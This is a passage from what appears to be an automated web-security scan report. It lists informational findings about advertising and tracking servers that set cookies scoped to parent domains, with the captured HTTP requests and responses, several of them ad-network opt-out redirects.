GET /?view=privacy&action=optout&nocache=0.8140653 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 04 Sep 2011 10:59:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: ADSESSID=s79st69i3l59m5pjm835m69qp0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: u=OPT_OUT; expires=Fri, 02-Sep-2016 10:59:26 GMT; path=/
Set-Cookie: ub=OPT_OUT; expires=Fri, 02-Sep-2016 10:59:26 GMT; path=/; domain=.wsod.com
Location: nai_status/optout_check.php
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


15.24. http://ads.amgdgt.com/ads/opt-out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.amgdgt.com
Path:   /ads/opt-out

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/opt-out?op=set&src=NAI&j=&nocache=0.7682459 HTTP/1.1
Host: ads.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: OO=OptOut; Domain=.amgdgt.com; Expires=Wed, 01-Sep-2021 10:59:25 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ads.amgdgt.com/ads/opt-out?op=verify_set&src=NAI
Content-Length: 0
Date: Sun, 04 Sep 2011 10:59:25 GMT


15.25. http://adstil.indiatimes.com/RealMedia/ads/adstream_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/13932048678/x32/OasDefault/3670000929000010THEADVER6209TOIR/Advert1x1Aug15/33323137376236613465363265316130  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/13932048678/x32/OasDefault/3670000929000010THEADVER6209TOIR/Advert1x1Aug15/33323137376236613465363265316130

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/13932048678/x32/OasDefault/3670000929000010THEADVER6209TOIR/Advert1x1Aug15/33323137376236613465363265316130? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMFD=011R02OxO106Bs; RMID=32177b6a4e62e1a0

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 02:38:57 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Cache-control: no-cache
Pragma: no-cache
Set-Cookie: RMFD=011R02aNO306Bq|O306Bs|O108EZ|O308FG|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Location: http://adstil.indiatimes.com/RealMedia/ads/Creatives/default/empty.gif
Content-Type: text/html; charset=iso-8859-1
Content-Length: 328

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://adstil.indiatimes.com/RealMedia/ads/Creativ
...[SNIP]...

15.26. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:57 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02OxO206Bs|O108EZ|O108FG|O108KY|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '800699', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

15.27. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:00:50 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02dtO206Bq|O306Bs|O108EZ|O308FG|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 245
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 119232;
</script>
<script type="text/javascript" src="http:
...[SNIP]...

15.28. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:01:27 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02OxO306Bs|O108EZ|O108KY; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '800700', size: '300250'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

15.29. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:58 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02OxO106Bq|O306Bs|O108EZ|O108Ea|O108FG|O108KY|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 245
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "4";
CasaleArgs.casaleID = 119232;
</script>
<script type="text/javascript" src="http:
...[SNIP]...

15.30. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:01:48 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02xiO306Bq|O306Bs|O108FG|O108KY|O108i0; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '804611', size: '300250'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

15.31. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: S=photos_html=FTyqjPT95zxOfh08A6sicw:adwords-usermgmt=nxJ1qeE2dub0qBBtppwupA; Domain=.google.com; Path=/; Secure; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 11
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 04:12:04 GMT
Expires: Sun, 04 Sep 2011 04:12:04 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

15.32. http://ak1.abmr.net/is/r1-ads.ace.advertising.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/r1-ads.ace.advertising.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/r1-ads.ace.advertising.com?U=/site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms&V=3-wPIFoasAKtPHZSxOUAYbqaXTMPjgJ+vSrrVXE9AL4eNtH7kmyr+P5PQi31vv0x46uxZtxJ%2fzGn0%3d&I=9A4FEFFF11C0CF6&D=r1.ace.advertising.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-4EC679574DCF656C7A8A556AE8270B6BE3805E46383A6B6BD8703B225F4CF37B-DA51BA75A8F5EBEDF256CF563A7044A6F48692021957BF686B5098126AF08716

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://r1-ads.ace.advertising.com/site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms?01AD=3f771Zx75eiiAo1ICd-29mdsUXR8OA0KjB71jAStEFNKAz1rwOJg4cA&01RI=9A4FEFFF11C0CF6&01NA=
Expires: Sun, 04 Sep 2011 03:04:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 03:04:02 GMT
Connection: close
Set-Cookie: 01AI=2-2-2327200222D3030DF687157A05E37F0C5F6A6200925CEB23D15726628A0EED5B-45E79EA6132609AE4186BAC5EA99AC008CF4D756B7278F27338A3BBF2DC65D49; expires=Mon, 03-Sep-2012 03:04:02 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


15.33. http://api.aggregateknowledge.com/optout2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.aggregateknowledge.com
Path:   /optout2

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout2?s=nai&nocache=0.5398929 HTTP/1.1
Host: api.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: uuid=""; Version=1; Domain=.aggregateknowledge.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 02-Sep-2016 11:12:43 GMT; Path=/
Location: http://api.agkn.com/optout2?s=nai&dc=1
Content-Language: en-US
Content-Length: 0
Date: Sun, 04 Sep 2011 11:12:43 GMT
Connection: close


15.34. http://api.agkn.com/optout2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.agkn.com
Path:   /optout2

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout2?s=nai&dc=1 HTTP/1.1
Host: api.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: uuid=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Fri, 02-Sep-2016 11:16:47 GMT; Path=/
Location: http://api.aggregateknowledge.com/optout2?s=nai&q=validate
Content-Language: en-US
Content-Length: 0
Date: Sun, 04 Sep 2011 11:16:46 GMT
Connection: close


15.35. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /j?s=119232&u=http%3A%2F%2Ftimesofindia.indiatimes.com%2Fcity%2Fmumbai%2Farticlelist%2F-2128838597.cms&a=2&id=35968545&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMDD=AAF1owE*; CMIMP=102679&1315097282; CMRUM2=04000000002925993182975414771; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=65131&1314825471&95308&1314825468&102679&1315097055; CMST=TmLJ305iyswF; CMD1=AAFehU5iyswAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Expires: Sun, 04 Sep 2011 02:37:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 02:37:33 GMT
Content-Length: 936
Connection: close
Set-Cookie: CMID=pCu470PS1JUAACQkUeAAAAAJ;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 02:37:33 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 02:37:33 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 02:37:33 GMT
Set-Cookie: CMRUM2=14000000006731d4ad-7dae-4402-b507-a0bc233d79fb;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 02:37:33 GMT
Set-Cookie: CMST=TmLkMU5i5G0C;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 02:37:33 GMT
Set-Cookie: CMDD=AAHRwAE*;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 02:37:33 GMT
Set-Cookie: CMD2=AAFbfk5i4gIAAdHAAAOPCAEBAAABW3NOYuRtAAHRwAADjNcBAQAAAVtWTmLhpgAB0cAAA48sAQEA;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 02:37:33 GMT

document.write('<iframe id=\'3c5f1556\' name=\'3c5f1556\' src=\'http://cas.sv.us.criteo.com/delivery/afr.php?zoneid=24952&bannerid=159988&did=4525c30c6e&rtb=10&z=0.8&b=_1UiJy1FIJchYk6jmJ18Z4w%253d%253
...[SNIP]...

15.36. http://ats.tumri.net/ats/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ats.tumri.net
Path:   /ats/optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ats/optout?nai=true&id=1936234986&nocache=0.7927026 HTTP/1.1
Host: ats.tumri.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Sun Sep 04 11:17:14 UTC 2011
Set-Cookie: t_opt=OPT-OUT; Domain=.tumri.net; Expires=Fri, 22-Sep-2079 14:31:21 GMT; Path=/
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://ats.tumri.net:80/ats/optoutcheck?nai=true&id=1936234986&nocache=0.7927026&tu=1
Content-Length: 0
Date: Sun, 04 Sep 2011 11:17:14 GMT


15.37. http://avn.innity.com/view/3898/35480/0/1315103295564  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://avn.innity.com
Path:   /view/3898/35480/0/1315103295564

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /view/3898/35480/0/1315103295564 HTTP/1.1
Host: avn.innity.com
Proxy-Connection: keep-alive
Referer: http://media1.bangkokpost.com/ads/Innity/030911TourismMalaysia728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:27:38 GMT
Server: Apache
Expires: Sat, 03 Sep 1983 02:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 02:27:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref=http://www.innity.com/p3p/p3p.xml,CP="CURa ADMa DEVa OUR BUS UNI COM NAV INT"
Set-Cookie: iUB=35480.1%3B; expires=Mon, 03-Sep-2012 02:27:38 GMT; path=/; domain=innity.com
Set-Cookie: iUC=3898.1%3B; expires=Mon, 03-Sep-2012 02:27:38 GMT; path=/; domain=innity.com
Set-Cookie: iUUID=3ec12b035c5d013fb13deb7123891e21; expires=Mon, 03-Sep-2012 02:27:38 GMT; path=/; domain=innity.com
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

15.38. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6036484&ns__t=1315103177178&ns_c=UTF-8&c8=Mumbai%20News%2C%20News%20in%20Mumbai%2C%20Mumbai%20City%20News%20%7C%20Cities%20News%20-%20Times%20of%20India&c7=http%3A%2F%2Ftimesofindia.indiatimes.com%2Fcity%2Fmumbai%2Farticlelist%2F-2128838597.cms&c9=http%3A%2F%2Ftimesofindia.indiatimes.com%2Fmumbaiinterstitial.cms HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 04 Sep 2011 02:25:39 GMT
Connection: close
